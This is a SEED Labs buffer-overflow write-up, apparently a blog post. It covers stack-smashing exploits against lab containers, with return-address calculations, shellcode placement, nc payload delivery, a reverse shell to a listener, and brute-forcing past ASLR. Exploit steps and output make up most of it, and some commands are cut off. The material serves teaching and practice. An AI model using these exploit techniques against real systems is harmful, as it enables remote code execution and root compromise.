SEED (2): Buffer Overflow Attack
1. Vulnerability principle
Example vulnerable code:
#include <string.h>

/* foo() copies an attacker-controlled string into a 12-byte stack buffer
 * with strcpy(), which performs no length check: this is the overflow. */
void foo(char *str)
{
    char buffer[12];
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";
    foo(str);
    return 1;
}
When the contents of str are copied into buffer, str is longer than 12 bytes, so buffer overflows and the extra bytes of str are written above the buffer on the stack. The goal is to plant code there and make the function's return address point to A, the address where that code is stored, so that the code executes.
A: the start address of the code.
NOP: opcode 0x90; executing it does nothing and execution simply continues with the next instruction. (The region between the code and foo() is filled with NOPs to make A easier to hit: as soon as the return address lands on any one of the NOPs, execution slides down to the code at A.)
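As an added example (not the lab's own code), the vulnerable foo() from above is shown beside a bounds-checked version: the fix rejects any input that would not fit together with its NUL terminator, so a string of 12 or more bytes never reaches the stack buffer and the saved return address cannot be overwritten.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable form from the lab: strcpy() copies until the NUL terminator,
 * knowing nothing about the 12-byte destination, so anything past byte 11
 * overwrites the saved frame pointer and return address above the buffer. */
void foo_vulnerable(const char *str)
{
    char buffer[12];
    strcpy(buffer, str);   /* no length check: this is the overflow */
}

/* Hardened form (added here): refuse input that does not fit, copy a
 * bounded number of bytes and always NUL-terminate. Returns 0 on success
 * and -1 when the input would not fit in the 12-byte buffer. */
int foo_safe(const char *str, char *out, size_t out_len)
{
    char buffer[12];
    size_t n = strlen(str);

    /* One byte is reserved for the terminator, so n must be < 12. */
    if (n >= sizeof(buffer))
        return -1;

    memcpy(buffer, str, n);
    buffer[n] = '\0';

    /* Hand the result back through a caller-supplied, bounded buffer. */
    if (out != NULL && out_len > 0) {
        strncpy(out, buffer, out_len - 1);
        out[out_len - 1] = '\0';
    }
    return 0;
}

int main(void)
{
    char result[12];
    const char *str = "This is definitely longer than 12";  /* 33 bytes */

    if (foo_safe(str, result, sizeof(result)) != 0)
        printf("rejected: %zu bytes do not fit in 12\n", strlen(str));
    if (foo_safe("eleven char", result, sizeof(result)) == 0)
        printf("accepted: \"%s\"\n", result);
    return 0;
}
```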
2. Lab setup
Enter the /Buffer_Overflow/Labsetup/server-code directory and run:
$ make
$ make install
$ cd ..    # go to the /Labsetup directory
$ dcbuild
$ dcup
Disable the protection mechanism: memory randomization
$ sudo sysctl -w kernel.randomize_va_space=0
Attack 1: Get the Parameters
$ echo hello | nc 10.9.0.5 9090
^C
If running this twice prints identical results and the addresses have the form 0xffffxxxx, memory randomization is off.
Container console:
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
$ cd /Buffer_Overflow/Files
$
Then use ebp and the buffer address to compute address A (ret) and the offset:
ret (A) = 0xffffd108 + 8    (min(A) = ebp + 8; max(A) = 517 - len(code))
offset = 0xffffd108 - 0xffffd098 + 4 = 116 (decimal)
Change the values of ret and offset in the file, save and exit; then run:
$
$ cat badfile | nc 10.9.0.5 9090
Container console:
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 517
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof(): 0xffffd428
server-1-10.9.0.5 | Buffer's address inside bof(): 0xffffd3b8
server-1-10.9.0.5 | (^_^) SUCCESS SUCCESS (^_^)
If '(^_^) SUCCESS SUCCESS (^_^)' appears as above, the attack succeeded.
Get Reverse Shell
Change the values of ret and A in the file:
### Put the shellcode at the end
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd428 + 40

# You need to calculate the offset
offset = 116

L = 4    # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset+L] = (ret).to_bytes(L, byteorder='little')
Open a new terminal window and run $ nc -lnv 7070 to start listening.
In another window, send the badfile to the server:
$
$ cat badfile | nc 10.9.0.5 9090
When the listening window shows the following, the reverse shell has been obtained:
Listening on 0.0.0.0 7070
Connection received on 10.9.0.5 51582
root@ec5152748270:/bof#
Attack 2: Buffer Size Unknown
$ echo hello | nc 10.9.0.6 9090
^C
Container console:
server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 6
server-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
server-2-10.9.0.6 | ==== Returned Properly ====
Change the values of ret and S in the file:
S: number of ret copies = buffer size / 4 (one ret is 4 bytes)
ret: buffer address + buffer size
### Put the shellcode at the end of the buffer
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd368 + 360

# Spray the buffer with S number of return address
# You need to decide the S value
S = 90
for offset in range(S):
    content[offset*4:offset*4+4] = (ret).to_bytes(4, byteorder='little')
$
$ cat badfile | nc 10.9.0.6 9090
Container console:
server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 517
server-2-10.9.0.6 | Buffer's address inside bof(): 0xffffd368
server-2-10.9.0.6 | (^_^) SUCCESS SUCCESS (^_^)
Attack 3: 64-bit Server
Principle:
$ echo hello | nc 10.9.0.7 9090
^C
Container console:
server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof(): 0x00007fffffffe200
Change start, ret and offset in the file:
start = 40
offset = rbp - buffer + 8
ret = any address in the range [buffer, buffer + 40]
$
$ cat badfile | nc 10.9.0.7 9090
Container console:
server-3-10.9.0.7 | Got a connection from 10.9.0.1
server-3-10.9.0.7 | Starting stack
server-3-10.9.0.7 | Input size: 517
server-3-10.9.0.7 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2d0
server-3-10.9.0.7 | Buffer's address inside bof(): 0x00007fffffffe200
server-3-10.9.0.7 | (^_^) SUCCESS SUCCESS (^_^)
Attack 4: Small Buffer (64-bit)
$ echo hello | nc 10.9.0.8 9090
^C
Container console:
server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 6
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof(): 0x00007fffffffe250
server-4-10.9.0.8 | ==== Returned Properly ====
Change the file:
ret = rbp + 1200
$
$ cat badfile | nc 10.9.0.8 9090
Container console:
server-4-10.9.0.8 | Got a connection from 10.9.0.1
server-4-10.9.0.8 | Starting stack
server-4-10.9.0.8 | Input size: 517
server-4-10.9.0.8 | Frame Pointer (rbp) inside bof(): 0x00007fffffffe2b0
server-4-10.9.0.8 | Buffer's address inside bof(): 0x00007fffffffe250
server-4-10.9.0.8 | (^_^) SUCCESS SUCCESS (^_^)
Re-enable the protection mechanism
$ sudo sysctl -w kernel.randomize_va_space=2
Run $ nc -lnv 7070 to start listening:
Listening on 0.0.0.0 7070
Change the exploit to the reverse-shell version.
Open a new terminal window:
$
$ chmod u+
$ ./
In my case it took 8 minutes and 12 seconds in total:
8 minutes and 12 seconds elapsed.
The program has been running 27296 times so far.
8 minutes and 12 seconds elapsed.
The program has been running 27297 times so far.
After success, the listening window returns a shell:
Connection received on 10.9.0.5 51372
root@ec5152748270:/bof#
Published on 2023-03-27 10:31:18.
Link: https://www.wtabcd.cn/zhishi/a/1679884278154989.html